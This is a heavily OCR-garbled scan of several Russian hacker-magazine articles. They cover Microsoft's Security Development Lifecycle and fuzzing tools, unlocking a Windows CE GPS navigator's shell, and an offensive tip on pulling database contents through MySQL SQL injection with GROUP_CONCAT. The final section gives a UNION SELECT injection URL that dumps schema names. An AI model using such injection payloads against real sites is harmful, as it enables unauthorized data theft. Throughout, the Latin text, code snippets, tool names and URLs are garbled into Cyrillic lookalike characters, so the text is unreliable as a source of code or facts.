атакжефаззинг— все ради того, чтобы выявить проблемы в безопасности! 
Понятно, что со временем каксами подходы, таки используемые инстру- 
менты меняются и модернизируются, поэтому 5 ПИ — тоже не статический 
документ: внутри МісгозоЙон обновляется каждые шесть месяцев. Лично 
меня сильно порадовал гибкий подход компании квнесению изменений. 
Новые правила берутся не из головы со словами: «Адавайте сделаем вот 
это, так будет лучше!» — вместо этого специальная группа прислушивается 
котзывам разработчиков и анализируетактуальные проблемы и угро- 
зы. Одним из источников данныхдля анализа является подразделение 
МісгозоЛ ЗесигТу Везропзе Сепіег, которое выпускает патчи для продуктов 
компании. Ребята из отдела, которым руководит Иван, изучают статис- 
тику выпущенных обновлений, и если в какой-то моментзамечают, что 
появилось непропорционально большое количество ошибок переполне- 
ния буфера или, скажем, ПРО, то начинают думать, как можно изменить и 
модернизировать ЗОИ, чтобы подобных багов больше не было. Это могут 
быть какие-то проверки, совершенно новые инструментальные средства 
(которые специально разрабатываются] или, вообще, изменения в компи- 
ляторе. Приятно, что у ребят есть возможность влиять нато, какработает 
компания. Они могут сначала подойти к группе, которая занимается компи- 
лятором, и попросить реализовать для него новый свитч (опцию], чтобы ус- 
транить проблему или сигнализироватьо ней еще во время компиляции, а 
потом сказать всем группам разработчиков, что использование этой опции 
отныне обязательно. Кстати говоря, ни один продукте момента введения 
ЗОИ не выходил без полного соответствия его требованиям. 

Н КАК ЭТО ИСПОЛЬЗОВАТЬ? 

Напрашивается один простой вопрос: а как вообще использовать ЗОИ 
— внедрить его внутри компании и группы разработчиков? Видимо, я 



оказался далеко не первым, кто его задает :]. В ноябре компания выпус- 
тила специальный мануал ЗОИ Орйтііайоп Мобеі, представляющий 
собой набор рекомендаций, а по сути, инструкцию отом, как внедрить 
ЗОИ в отдельно взятой компании. Понятно, что в рамках одной статьи 
полностью раскрыть требования и рекомендации 50І_ не получится (зато 
по этой теме есть книжки], но чтобы понять, о чем речь, приведу несколь- 
ко примеров из категории «лучшие практики». 

Все проекты на С/С++ необходимо компилировать с флагом /05 (защита 
от переполнения буфера на основе стека], а линковать с /ЗАВЕЗЕН 
(/ЗабеЗЕН) — одно из правил 50Е. В этом случае будут использованы ме- 
ханизмы защиты памяти с целью предотвращения эксплуатация общих 
уязвимостей. Еще одно правило из «Везі Ргабсез» — использовать флаг 
/ІМХСотраЕ чтобы указать на совместимость бинарника со средствами 
предотвращения исполнения данных (Э ЕР) (/ІЧХСотраІ:]. 

В ходе разработки обязательно использовать несколько утилит, в том числе 
— РРЕІазС ЕхСор, АррІісабопѴегШепТулза для статического анализа кода 
Р В Еіа заявляется частью Ѵізиаі Зііисііо (начиная с версии 2005] и вызывает- 
ся с помощью специальной опции компилятора — /апаіуге. Кпримеру, на 
следующий участок кода будет выдано предупреждение об использовании 
в цикле функции _а Носа, что может быстро переполнить стек: 

сЬаг *Ъ; 

СІО { 

Ь = (сйаг*)_а11оса(9) 

} \УЬі1е (1) 

Также распространяющийся когда-то как отдельная утилита, а теперь 
ставший частью Ѵізиаі Зіисііо, ЕхСор представляет собой инструмент для 
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Диаграмма угроз в $Р І_ТНге аі Мосіеіі пд Тооі 







> ІГЙО 

Внутри МісгозоЙ 
всегда использу- 
ется более новая 
версия ВБИ (так, 
сейчас публично 
доступна версия 
3.2, хотя М3 «сидит» 
на 4.0]. Внутри 
компании ЗБІ_ 
может обновляться 
раз в пол года, но 
выпускать новую 
публичную версию 
с такой частотой 
просто нецелесооб- 
разно. 




> СІѴСІ 

На БѴБ ты найдешь 
некоторые из упомя- 
нутых инструментов. 



анализа кода, проверяющий сборки суправляемым кодом 
на соответствие правилам разработки с применением .ЫЕТ 
Ргатеѵѵогк (да и вообще, здравому смыслу]. Статический 
анализ позволяетвыявить проблемы безопасности, быстро- 
действия и надежности. 

АррІісаЗоп Ѵегібег представляет собой уже динамичес- 
кий анализатор для иптападеб-кода. Динамический 
подход подразумевает, что программа анализируется 
прямо во время ее выполнения. Ар рѴе гіб отслеживает 
активность приложения и проверяет, не выполняетли 
оно действий, опасных с точки зрения безопасности. 
Например, если исследуемая программа создаст объект 
без дескриптора безопасности или небезопасным обра- 
зом передает параметры в АРІ, то выдается предупреж- 
дение. 

Большая работа по улучшению качества кода была сдела- 
на в самой Ѵізиаі Зііісііо. ЮЕ будет сильно ругаться, если 
ты попробуешь использовать опасные функции, напри- 
мер, зітсру. Рассмотрим фрагмент кода: 

ѵоісі ТипсЩсЗаг *р) { 
сЬаг сЗ. [ 2 0 ] ; 
зБгсру (с!,р) ; 

// еСс 

} 

Если *р содержит ненадежные данные, то в этом коде 
имеется уязвимость. Но компилятор сам можетзаменить 
вызов функции зітсру вызовом более безопасной функции, 
которая позволитограничить объем копируемых данных в 
соответствии с размером буфера назначения (а размер бу- 
фера статичен и известен в момент компиляции]. Ѵізиаі С++ 
позволяет включить в файл заголовков зіЗаіхЬ следующую 
строку: 



#3е і іп _СКТ_8ЕСІШЕ_СРР_ОѴЕКБОАБ_8ТАББАКБ_ 
БАМЕ 8 1 

Все, теперь компиляторзаменитнебезопасную функцию 
таким образом: 

ѵоісі іипс(сЪ.аг *р) { 
сЗаг сЗ [ 2 0 ] ; 

зБгсру_з (сі, соипРоі (3) , р) ; 

// еСс 

} 

Вотлишь некоторые из инструментов, которые предлагает 
использовать ЗБІ_. На самом деле утилит для анализа кода 
и проверки приложения намного больше. В этомты можешь 
убедиться, прочитав врезку. НоЗБІ_ — это нетолько набор 
утилит, это еще и описание подходов к разработке безопас- 
ного кода, в том числе, моделирования угроз. 

В МОДЕЛИРОВАНИЕ УГРОЗ 

На скриншоте ты видишь диаграмму угроз для одного 
из приложений. Вообще, моделирование угроз — это 
один из основных элементов Мі егозой ЗОБ, можно даже 
сказать, святая святых всего ЗОБ. Такие диаграммы 
легко рисуются на листе бумаге или на доске в офисе, 
но для этого нужно четко представлять себе правила 
их построения. На первых порахудобнее использовать 
специальные средства, которые выпускаются доволь- 
но давно, но до недавнего времени не отвечали всем 
современным требованиям. 

Во время беседы Иван рассказал, что при его непос- 
редственном участии в ноябре компания выпускает 
совершенно новое средство моделирования угроз — и 
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[Начиная с ѴізиаІЭГибіо 2005, статический анализатор кода РПЕІазІ: 
включен в состав ѴізиаІЭіибіо и вызывается специальной опцией ком 
пилятора — /Апаіузе 



сом- 




вот оно перед нами. 5РІ_ ТЬгеаГ Мобеііпд Тооі свободно доступно 
на сайте Мі егозой, и единственное, что нужно для запуска, — это 
установленная на компьютере программа Ѵізіо. 

Программа программой, а как создавать диаграммы угроз? Хо- 
роший вопрос! Начать стоит с некоторой обзорной диаграммы, в 
которой должно быть несколько интеракторов (участников], один 
или два процесса, хотя бы одно хранилище и соединяющие эти 
элементы потоки данных. Такая диаграмма должна иллюстрировать 
основную функциональность приложения. Следующий важный 
этап заключается в установке границ доверия. Границы доверия 
пересекают потоки данных — это точки, в которые может вмешаться 
атакующий. Так, процессы, общающиеся по сети, всегда пересека- 
ют границу доверия. 

Есть несколько правил, которые нужно проверить: 

(Не появляются ли данные из воздуха? 

і Запомни: данные приходят из внешних 

— — — . итеракторов или хранилищ. 



Ш всех ли данных есть пользователи? 






______ (Не перемещаются ли данные маги- 
ческим образом? Они всегда идутчерез 
процессы! 

Далее необходимо пройтись по всем 
процессам и хранилищам данных, чтобы 
посмотреть, не нужно ли их разбить на 
более мелкие детали. В конечном итоге 
мы получаем готовую диаграмму, в которой можно распознатьугрозы и 
выполнить их смягчение. Основная фишка ЭОЕТЬгеаІ Мобеііпд Тооі как 
раз втом, что она сама предлагает подсказки во время построения диа- 
грамм, указывает на ошибки и позволяет седлать направляемый анализ 
угроз и смягчений. Кстати, ееты найдешь на диске. 




г фаззинг 

В М5 достаточно много внутренних средств, которые пока не готовы, 
но со временем могут принести пользу, в том числе, для фаззинга. 
Первый серьезный фаззер был написан в компании четыре с поло- 
виной года назад, когда мало еще кто знал этоттермин. Напомню, что 
фаззинг — это метод нахождения проблем в безопасности, основан- 
ный на подаче интересным образом манипулированных данных на 
вход программы: будьто АРІ или ввод данных пользователей. Есть 
много его разновидностей, но, в целом, он считается наиболее эффек- 
тивным средством выявления проблем безопасности (если смотреть 
на количество найденных им багов). 

Фаззинг разделяется на множество категорий. Есть файл-фаззинг, 
который фаззит файлы. Программа, которая читает файл, каким-то 
образом его разбирает на части и что-то с ними делает. Например, ѴѴогсІ 
с бос-файлами, просмотрщик изображений — с 6РЕО. Если взять этот 
6РЕО и интересным образом поменять биты, то, возможно, эта програм- 
ма, которая разбирает, вылетите проблемой переполнения буфера. 
По-философски, фаззинг распределяется на генерацию и мутацию. 
Генерация — случайным образом придуманный набор байтов, который 
подсовывается томуже ѴѴогсГу со словами: «Это на самом деле бос- 
файл, читай его». Мутация — изменения в хорошем файле. Преимущес- 



Прогр; 
для ЗЬ 



аммы 

Ь 



Как уже было сказано, — не просто набор методик, описы- 

вающих создание безопасного кода, но еще и утилиты, которые 
всячески помогают в этом программистам. Какими бы ни были 
убедительными наставления ЭБЬ, гораздо более практичными 
для программиста, естественно, являются именно программы. 
Для статического анализа кода Місгозобб предоставляет тулзы 
Місгозобб Зоигсе Собе Апаіугег бог 1гуесбюп и Х55 Бебесб Вега. 

Последний подключается к Ѵізиаі Зшбіо как плагин и позволяет 
распознать Х5 5-уязвимости в создаваемых веб-приложениях. 
Ошибки Х55 могут быть выявлены и с помощью программ, 
работающих в качестве прокси : КАТ5 — Кои§Ь АибШп§ Тооі бог 
Зесигібу Питр : / /ѵѵш. боггібѵ. сот /зесигібу-гезоигсез /габз . і зр) и 
РгохМоп Гйцр://ѵАѵш.богйбу.сот/5есигіГѵ-ге5оигсе5/гаЩ.І5р) . 

На уровне кода и фреймворка можно также воспользоваться 
следующими библиотеками: 

МісгозоббАпбі-Сгозз 5ібе 5сгірбіп§ ЫЬгагу Ѵ1.5 бог .НЕТ арріісабіош и 

АпбіХ55 бог баѵа Піі:і:р://ѵѵѵѵѵѵ.^б55есигіі:у.со) 

Помимо этого интерес представляют: 

ЗібеЬоск — позволяет разработчикам на АсбіѵеХ полностью огра- 
ничить доступ к заранее заданному списку доменов или лимити- 
ровать его по времени. Утилита относится к типу «Везб Ргасбісез», 
то есть к рекомендуемым методикам; 

Ваппеб.Ь — файл-заголовок, позволяющий избавиться в своих 
исходниках от функций, которые давно не рекомендуются к 
использованию и запрещены 50Ь. 



тва и недостатки есть, как правило, у каждого из подходов. Очевидно, 
что втаких вещах, каксетевые протоколы, имеетсмысл применять 
подходы мутации, используемые Мап-іп-ібіе-тіббіе фаззерами. 

Помимо этого фаззинг разделяется на: 

(Глупый (битЬ) фаззинг — ничего не знает о структуре файлов. «Давай 
вот этот б итик инвертируем или сгенерируем случайный набор данных 
и пошлем его». 

(Умный (эта гб] фаззинг— имеет некоторые данные о структуре данных. 
К примеру, ему известно, что в 6РЕО в таком-то месте хранится длина 
какого-то блока. Посмотрим, что будет, если мы его увеличим на один. 
Или на максимальное значение, которое может содержаться в этом поле. 
Что получится? Нужно грамотно описать формат. 

Есть внутренние средства, о которых Иван не может рассказывать 
по причинам ЫОА. Но есть и публично доступные фаззеры: Майк 
Эддингтон, который плотно сотрудничает с МісгозоіТ, создал фаззер 
РеасЬ (в переводе — персик, ЫТрУ/реасЫюггег.сот ]. Достаточно 
эффективный фаззер, который принимает реасб рйз («косточки 
от персика»] — как раз те самые описания формата, о которых мы 
говорили. С его помощью можно фаззить что угодно: включая сетевые 
сервисы, РРС, СОМ/ЭСОМ, ЭОЕ-хранимые процедуры и файлы. Помимо 
этого стоитобратить внимание на: 

• ЕіІеЕигг, а также другие фаззеры с сайта Риггіпд Боііѵѵаге ( ЫТрУ/ѵѵѵѵѵѵ. 
Іиггіпд.огдЛиггіпд-зоІбѵѵа ге ): 

• Еііе Еиггегз, ЕиггЬох, ѴѴіпбоѵѵз ІРС Риггіпд Тооіз, и Еогепзіс Еиггіпд 
Тооіз от команды І5ЕС Рагіпегз ( ѵѵѵѵѵѵ.ізесрагГпегз.со ). 

В ЗАЧЕМ НУЖНА 50І_? 

Очень просто! Это шанс для всех разработчиков писать безо- 
пасный код, не будучи экспертами в безопасности. Не так уж 
сложно: при правил ьной-то поддержке и наличии правильных 
инструментов! т 
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ЭКСПЕРИМЕНТЫ 
С НАВИГАТОРОМ 

ПРОКАЧИВАЕМ ОБЫЧНЫЙ СР5-НАВИГАТ0Р 

СРЗ-навигатор. Вроде бы все просто, как дважды два: программа навига- 
ции, мультимедиа-проигрыватель и меню для запуска — ни шага в сторону. 
Но не только на это готов девайс с полноценной Виндой внутри. Уж мы-то 
знаем, что выжать из него можно намного больше! 



олгое время в качестве 6Р5-навигатора я использовал 
обычный коммуникатор на базе ѴѴіпсІоѵѵз МоЬіІе. Пона- 
чалу это казалось мне чрезвычайно удобным. С одной 
стороны — обычный телефон с классными возможностями, но ведь в 
случае необходимости — еще и полноценный 0Р5-навигатор! 0 ним 
я перестал бояться уехать не туда, простояв пару часов в московской 
пробке, а в прошлогодней новогодней поездке девайс не дал нам с 
Никитозом умереть в машине, подсказав, как доехать до ближайше- 
го отеля. Отель в маленьком финском городе Ха ми на оказался выше 
всех похвал — в тот момент мы окончательно прониклись реализо- 
ванной функцией РОІ, представляющей полезную базу данных для ту- 
ристов (отели, кафе, заправки, гостиницы, достопримечательности 
и т.д., и т.п.). Надо сказать, что у платформы просто огромный выбор 
по части программ навигации. Для России есть четыре отличных 
продукта, которые развиваются семимильными шагами, выпуская 



обновления и новые более детальные карты, не только Питера и 
Москвы, но и многих других, даже небольших городов. 

Увы, не все так гладко. За год использования дали знать о себе не- 
сколько неприятных моментов, и если поначалу я вполне мирился 
с ними, то со временем они начали не на шутку напрягать. 
Ксожалению, коммуникатор, снаряженный 0Р5-навигацией и еще 
тысяча и одной утилитой для комфортной жизни, работал очень туго. 

В лучшем случае были просто тормоза, а в худшем — вылеты програм- 
мы навигации. Полагаю, не надо рассказать про мои чувства, когда 
из-за пропущенного в такой ситуации поворота приходилось стоять 
два часа в пробке, чтобы попробовать повторить маневр. Оитуацию 
отчасти помогли решить альтернативные прошивки, в которых энту- 
зиасты лихо оптимизировали, борясь за каждый свободный мегабайт 
оперативы. Однако проблемы, когда во время работы 6РЗ-навига- 
тора поступали звонки, по-прежнему возникали. К то му же, сильно 
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Какую 

навигационную 

программу 

ставить? 

«Навител» 

паѵйеі.ги 

Одна из наиболее прогрессивных разработок, которую производи- 
тели охотно устанавливают в свои навигаторы. В этом нет ничего 
удивительного — на сегодняшний день у нее наибольший охват 
территории по России, не считая неофициальных карт, которые 
выпускаются любителями. 

«Авто спутник» 

аідозрідпік.сот 

Не успев выйти в 2007, система стала одной из наиболее любимых 
в народе. В основе лежат карты признанного мирового лидера 
цифровой картографии — компании Теіе Аіііаз, дополненные 
слоями данных. Интерактивный сервис «АВТОСПУТНИК Опілпе» 
поддерживает подгрузку РОІ сразу на навигатор (в том числе, 
камеры, «лежачие полицейские», посты и пикеты ДПС и т.п.) и 
автоматическое обновление по мобильному интернету. 

ІСО 

і-^о.сот/ги 

Один из мировых лидеров навигационной индустрии, который 
неплохо работает в России. Восьмая версия приложения поддер- 
живает трехмерное моделирование зданий, рельефа местности и 
памятников архитектуры, — что выше всяких похвал. 

ТотТот 

\ѵтѵ.ГотГот.сот 

Если в Европе и Штатах слово ТотТот давно стало нарицатель- 
ным, то у нас с ним знакомы пока немногие. Виной тому — долгое 
отсутствие толковых карт. Однако в конце года компания предста- 
вила на рынке свои етЪесМеб-решения, а значит, ситуация скоро 
изменится. 



«ТотТот Ыаѵідаіог» 



Сагтіп МоЬіІе ХТ 



запарило включать и выключать громоздкие навигационные пакеты, 
ожидая сигнал со спутников. Короче говоря, выводдля себя я сделал 
однозначный — когда используешь 0Р5 часто, то это должно быть 
отдельное устройство, а не модифицированный телефон! 



ѵѵѵѵѵѵ.^агтіп.ги 

С этой системой лично я знаком по использованию в своем теле- 
фоне Нокіа, однако у нее есть отличные версии для ѴѴіпсіоѵѵз, в том 
числе и ѴѴіпСЕ. Кстати говоря, карты России постоянно обновля- 
ются. 



г ПРОБЛЕМЫ ЕМВЕРОЕО-УСТРОЙСТВ 

Если не коммуникатор (и не КПК, что, по сути, то же самое), — что 
тогда? Ответтут самый простой, а для большинства, вообще, 
очевидный: 0Р5-навигатор, который продается в любом магазине 
электроники. Выбор огромный: навигаторы сейчас можно купить от 
самых разных производителей. В действительности многие из них 
выпускаются на одних и тех же китайских фабриках, но под разными 
лейблами. Разница лишь в том, какое программное обеспечение на 
них установлено. И тут кроется самая главная загвоздка. Поскольку 
это изег-бгіепсііудевайсы, то никаких возможностей для маневров 
в них по умолчанию нет. При включении сразу запущена программа 
навигации или, в лучшем случае, — оболочка, через которую можно 
добраться до самых примитивных настроек и запустить мультиме- 
диа-проигрыватель (в случае большого экрана с его помощью впол- 
не можно смотреть фильмы). И все! Никаких там ѴѴіпсІоѵѵз, установки 



и удаления программ, реестра — бери, что дают. Но значит ли это, 
что сделать с «тупым» девайсом ничего нельзя? Вовсе нет. 

Н РАЗБЛОКИРУЕМ ПРИБОР 

Этим летом мне посчастливилось поучаствовать в мероприятии 
«Новые территории 6Р5», проводимом компаниями Ѵохіеі и «Нави- 
тел», где в команде с новыми товарищами я зарешал конкурентов 
(три десятка других участников) и получил в качестве бонуса но- 
венький навигатор Ѵохіеі Саггега Х433. В качестве жертвы экспери- 
мента я буду использовать именно его, но эти же подходы примени- 
мы к большинству СРЭ-навигаторов, представленных на рынке. 
Сначала давай разберемся, что же вообще находится внутри наше- 
го девайса. Понятно, что разработчики навигационных продуктов 
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Пишем приложение для ѴѴіпСЕ 



Если тебя каким-то образом не устраивает стандартное ПО или 
ты хочешь написать, скажем, свое собственное меню, то никакой 
проблемы в этом нет. Только придется разобраться с несколькими 
приложениями. 

ѴІ5иа1 5Шсііо. Все последние версии Ѵізиаі Зшсііо (кроме Ехргезз- 
версий) поддерживают создание проектов для ѴѴіпсІоѵѵз СЕ/ ѴѴіпсІоѵѵз 
МоЪіІе — позволяют отлаживать приложения как на самом устройст- 
ве, подключенном через кабель к компьютеру, так и через специаль- 
ный эмулятор и набор образов с виртуальными мобильными ОС. 



РІаНогт ВшМег. Специальное средство, используемое для 
создания платформы, драйверов, а также самих приложений. 
Короче говоря, с ним можно запустить систему на 
каком-либо девайсе. Интерес также представляет 5БК, включен- 
ное в состав РІаНогт ВшЫег. В нем хранится инфа 
о работе с разными микропроцессорами (ЗирегН, х86, МІР5, 
АКМ). 

ЕтЪесШесІ ѴІ5иа1 С + + ( еѴСЛ . Специальная сборка Ѵізиаі С + + для 
разработки етЪесМеб-приложений на базе ѴѴіпсІоѵѵз СЕ. 





> Ііпкз 

Ответ на свой вопрос 
потеме практически 
1 00% можно найти 
на англоязычном 
форуме дрзраззіоп. 
сот , а также русских 
дрз-сіиб.ги и Дрсіа.ги . 




> ІГЙО 

Прошить свой 
навигатор несложно. 
Берешь карточку на 
512 метров (или боль- 
ше), форматируешь 
в іаіі 6 и копируешь 
в корень содержи- 
мое архива. Далее 
вставляем карточку 
и, удерживая кнопку 
питания, переводим 
движок из положения 
ой в оп. Отпуска- 
ем питание. Все, 
прошивка началась. 
Внимание, процесс 
долгий, минут 1 0-15. 
Если кажется, что 
зависает, не паникуй, 
— это нормально. 





Прм&ѣгп 

о*гт пт 

Оагтіп МоЬіІе ХТ 



пишут не для конкретной архи- 
тектуры девайса, а для какой-то 
платформы, и платформа эта 
— ѴѴіпсІоѵѵз СЕ (ѴѴіпСЕ). Это специ- 
альная версия ѴѴіпсІоѵѵз с ядром, 
предназначенным для работы на 
встраиваемых системах. Система 
разработана таким образом, чтобы 
работать на устройствах, имеющих 
минимальный объем памяти. Так, 
ядро ѴѴіпсІоѵѵз СЕ теоретически 
может работать на 32 Кб памяти, но 

это уже крайность. С графическим ^ — 

г г т Мю Мепи позволяет сколь угодно сложно настроить меню 

интерфейсом ОѴѴЕЗ-устройствам 

требуется от 5 Мб оперативки. 

Некоторые устройства не имеют 
дисковой памяти и могут быть сконструированы как 
«закрытые», без возможности расширения пользовате- 
лем (ОС в этом случае «зашита» в ПЗУ), но с ОРЗ-нави- 
гаторами такой подход встречается очень редко. До ОС 
можно добраться и использовать ее — осталось только 
выяснить, как. 

Итак, у нас есть персональный навигатор (его часто на- 
зывают РІ\І Б или РІ\ІА — учти это при поиске программ), 
у которого по умолчанию сразу стартует симпатичная 
менюшка с кнопками для запуска программы 6Р5-на- 
вигации, включения ВТ-гарнитуры, открытия окошка 
с настройками и проигрывания музыки/видео/фоток. 

Ни шага вправо, ни шага влево — все для ушастых 
пользователей (зато просто и стабильно — огромный 
плюс подобных девайсов). Придется его разлочить или, 



другими словами, как-то добраться до самой ѴѴіпсІоѵѵз, 
где уже можно будет делать что угодно: менять оболоч- 
ку, устанавливать альтернативные приложения и т.д. 
Покопавшись на замечательных форумах ѵѵѵѵѵѵ.дрз-сІиЬ. 
ги и 4рсІа.ги . я быстро нашелосновнойспособразлочки 
ЕтЬесІсІесІ-девайсов, который по идее подходит для 
большинства РІ\ІБ-моделей. 

Смысл в том, чтобы взять 5Б-карточку и создать на ней 
файл зЬеІЕіпі со следующим содержанием: 

\ѵѵіпс!оѵѵз\ехр1огег . ехе 

Можно было воспользоваться сагб-ридером, но при 
установленной программе АсііѵеЗупс от МісгозоЙ 
карточка, вставленная в девайс, отлично монтирова- 
лась в системе (естественно, при подключенном по БЗВ 






Был просто СРЗ-навигатор — теперь же полно- 
ценная мобильная платформа 



Программа Зузіет Іпіюгтабоп ле 
сит в основе большинства сбороі 



■- 
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Недры В Р5-навигатора: ѴѴіпсІоѵѵзВЕ установлена в каждом из них 



устройстве]. После создания девайс должен был его прочитать и 
запустить вместо оболочки и программы — ехріогег.ехе (обычную 
Винду). Но не вышло! 

Ладно, будем действовать по-другому. При подключении девайса к 
компьютеру в системе появляется два диска — на одном отобража- 
ется часть файлов с внутренней памяти устройства, а другой, как уже 
было сказано, — карты памяти. На встроенном диске было несколько 
папок Аибіо, Мизіс, Ѵібео и каталог N аѵііе I, который представлял 
особый интерес. В качестве стандартной программы навигации на 
девайсе установлена замечательная софтина «Навител 3.2», у кото- 
рой, пожалуй, наиболее большее покрытие по России. В папке был 
исполняемый файл ІЧаѵііеІ.ехе — можно предположить, что его-то и 
запускает стандартная оболочка при нажатии на кнопку «ВР5-нави- 
гация». И что тогда? По большому счету, можно временно пере име- 
новать папку с «Навител ом», а вместо нее скопировать файлы любой 
другой навигационной системы, скажем, І0о — тупо переименовав 
Ідо.ехе в ІЧаѵііеІ.ехе. Но это же некрасиво (хотя я проверил и такой 
способ)! 

Возможность запускать любой ехе-шник — это уже что-то. Был 
смысл попробовать подсунуть под видом паѵйеЕехе стандартный 
файл Винды ехріогег.ехе. К сожалению, ни одна из системных папок 
на при монтирован ном диске не отображалась, поэтому взять его 
было неоткуда. В общем, нужен был обходной путь, и он быстро 
нашелся — оказалось, есть специальная утилита сеБезкІор.ехе, 
которая как раз и открывает рабочий стол Винды. Переименовав его 
в ІЧаѵііеІ.ехе, я перезапустил навигатор, выбрал в оболочке пункт 
«Навигация» и... увидел заветную Винду :]. Быстро освоившись с 
незнакомой 00, я зашел в панель управления и выяснил, что имею 
дело с ѴѴіпсІоѵѵз 0Е 5.0. 

Далее, через обычный проводник («меню Пуск ѴѴіпсІоѵѵз 
Ехріогег»), нашлась программа, которая запускалась в качестве 
шелла (\ВаСа5Согаде\СепЦгаІАР . ехе], а рядышком был завет- 
ный файл и к ССЖР . іпі. 0 его помощью легко можно было пере- 
назначить реакцию на нажатие кнопок. Теперь ничего не стоило 
закачать на навигатор, скажем, І0о и забиндить его запуск на кнопку 
«0Р5», отредактировав следующую строчку: 

СР8РаСіі= \ІІзег ХЫаѵіСеІ ХЫаѵіСеІ . ехе 

Забавно, что рядом была закомментированная строка, запускающая 
как раз І0О8 :). Отказавшись от стандартной функциональности, 
можно было забиндить на остальные кнопки запуск любых других 
навигационных программ (их обзор читай во врезке] — в итоге, мы 
получали универсальную «машинку», хотя и не в самом красивом 
виде. Кстати говоря, для более удобной навигации и редактирова- 



Как быстро запус- 
тить нужную прогу 

Если желания ковыряться во внутренностях девайса, осваивая 
премудрости общения с ѴѴіпсІоѵѵз СЕ, у тебя нет, а желание запус- 
тить другую программу для навигации, напротив, велико, можно 
попробовать один простой способ, который работает на многих 
девайсах. Если тебе скажут «попробуй выполнить продмену», это 
значит следующее: 

^Сначала находим нужную навигационную софтину для РИА; 

2 Перемещаем ее на карту памяти, причем желательно другую 
(чтобы ни в коем случае не испортить стандартное ПО, где воз- 
можно есть ключи и т.д.) ; 

Ина карте памяти переименовываем папку с программой в 
МоЬіІепаѵі^агог, а ехе-файл — в тоЬіІепаѵі^агог.ехе; 

^Запускаем устройство. 

Мой Ѵохііеі Саггега хранит все системные файлы и программу 
навигации во внутренней памяти, поэтому подобный фокус на 
нем не сработал. 



ния файла пришлось отыскать специальную версию ТоіаІСотапсІег 
для ѴѴіпСЕ. 

А можно ли сделать красиво? Можно! 

В АЛЬТЕРНАТИВНОЕ МЕНЮ 

Что такое меню? По сути, форма с несколькими кнопками — ни- 
чего не стоит написать ее самому, совладав с соответствующими 
возможностями Ѵізиаі Зіисііо (подробнее — во врезке]. Я, впрочем, 
не стал брать быка за рога и попробовал найти то, что уже сделано 
умельцами. Очень скоро нашлась специальная сборка для младшей 
модели отѴохіеІ, которая самым наглым образом включала в себя 
три навигационные программы и еще десяток утилит, а самое глав- 
ное — удобное меню для запуска всего этого пиратского хозяйства. 
Уверен, что аналогичные вещи энтузиасты с неподдельным интере- 
сом варганят для любых производителей. Мне же стало интересно 
найти универсальную программу, представляющую собой исключи- 
тельно оболочку без всякой пиратской составляющей — в виде пре- 
дустановленных навигационных программ. И такой шелл нашелся! 
МіоРоскеІ 2.0 ( ШрѴ/ѵѵѵѵѵѵ.дрзраззіоп.сопп/іогиппзепЛоріс. 
азр?Т0Р1С ІР = 109690 ) изначально разработан для девайсов 
компании Міо, но легко устанавливается и на многиедругие 
модели. Если описывать в двух словах, это самый настоящий 
универсальный солдат. Вместе с шеллом по умолчанию идет 
медиаплеер для проигрывания видео и музыки, разные читалки 
книжек, дюжина игр, несколько графических просмотрщиков, 
проги для работы с документами М5 Оііісе, системные тулзы вро- 
де редактора реестра, файлового менеджера и менеджера задач 
и т.д. Нуа о том, что ее можно подружить с любыми программами 
навигации я даже говорить не буду. Зато открою секрет: меню 
большинства разлочек (альтернативных оболочек) построено 
на основе специальной программы Бузіет Іпіотаііоп ( Шр7/ 
дрзіасЬо.ЬеіТегзоІТ.сІе ). 

Итак, мы достучались до самой Винды, нашли, где хранится обо- 
лочка и подыскали ей достойную замену. Остался один вопрос: как 
поменять оболочку по умолчанию, чтобы каждый раз не запускать ее 
вручную? Точно также, каки вобычной Винде: поправить парамет- 
ры автозагрузки, покопавшись в реестре. Для этого либо придется 
поставить редактор на сам навигатор, либо сделать это напрямую с 
компьютера с помощьютулзы Редізігу ѴѴогкзбор. 

Дерзай! т 
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Уі^ШііИШЦЮгііМкІШІ Леонид «св@ ѵѵі_ея» исупов 

/ П0Ю@МАІІ..П1І / / СП АѴѴІ.ЕВН АСК@ВАМВІ_ЕК.ВІІ / / КАІГОГЫГЕ@ВК.ВІІ / 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



№1 

2223И ОБЪЕДИНИТЬ ВЫВОД ЗАПИСЕЙ ИЗ ТАБЛИЦЫ БД В ОДНУ 
СТРОКУ ПРИ ПРОВЕДЕНИИ 50І_-ИНЪЕКЦИИ В МѴ50І. 

РЕШЕНИЕ: 

Несмотря на свою «популярность», 50І_-инъекции по-прежнему встреча- 
ются на множестве ресурсов. Но, как известно, основной проблемой при 
реализации скул-инъектов является вытягивание записей изтабличек. 
Конечно, можно постаринке менятьзначение ЫМІТ’а, регулируя, тем 
самым, вывод данных в отображаемые поля. Однако есть более простой и 
действенный способ, заюзав который, ты получишь много данных и сразу. 
Речь идето функции аШПР_СОМСАТ ( ) в Му50І_=> 4.1 версии. Она 
позволяет объединить в одну строку несколько записей из табл и цы (по 
аналогии с известной тебе функцией сопсаШ, объединяющей несколь- 
ко полей]. Проще говоря, с помощью окоер_С(ЖСАТ ( ) ты можешь 
отобразить не одну, а сразу десяток-другой записей изтаблички. Причем, 
максимальный объем получаемыхтобой данных по дефолту ограничен 1 
метром (ака 1 024 байта], — именнотакоезначение имеетпоумолчанию 
системная переменная дгоир_сопсаІ_тах_Іеп. Конечно, слить всю необ- 
ходимую инфу вряд ли удастся, но вотупроститьсебежизнь можно изряд- 
но. Итак, несколько важных особенностей функции ОКОІІР_СОЫСАТ ( ) : 

1. Функция позволяетзадавать собственный символ разделения записей. 

2. Функция поддерживает работу стакими операторами, как різтіыст, 
ОБЩЕЕ ВУ, АЗС/БЕЗС. 

3. Функция не поддерживает работу с оператором ыміт. 

4. Максимальный объем получаемых с помощью функции данных — 1 024 
байта (по дефолту]. 

В качестве примера рассмотрим получение списка всех БД и всехтабли- 
чекдля текущей БД с помощью функции ОКОЕР_СОБГСАТ С ) вМу5СП_=> 

5 версии. 

1. Предположим, у нас есть зці- инъекция вида: 

ЬЩкр : / /чапала, каскесі. сот/іпсіех . ркр?ісі=-1 
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Не забывай про 6Р01ІР_С0І\ІСАТ(] 



2. Получим список всех БД (при условии, что данные <= 1024 байта] за 
один запрос в одном поле: 



ІіРРр: //іАмхѵ.каскесІ. сот/іпсіех . ркр?іс!=- 
1+ШІ0М+8ЕЬЕСТ+СК01ІР_С0Ж:АТ (8СНЕМА_ЫАМЕ ЗЕРАКАТОК 
0?0а) +ЕК0М+іп1огтакіоп_зскета . 8СНЕМАТА/ * 



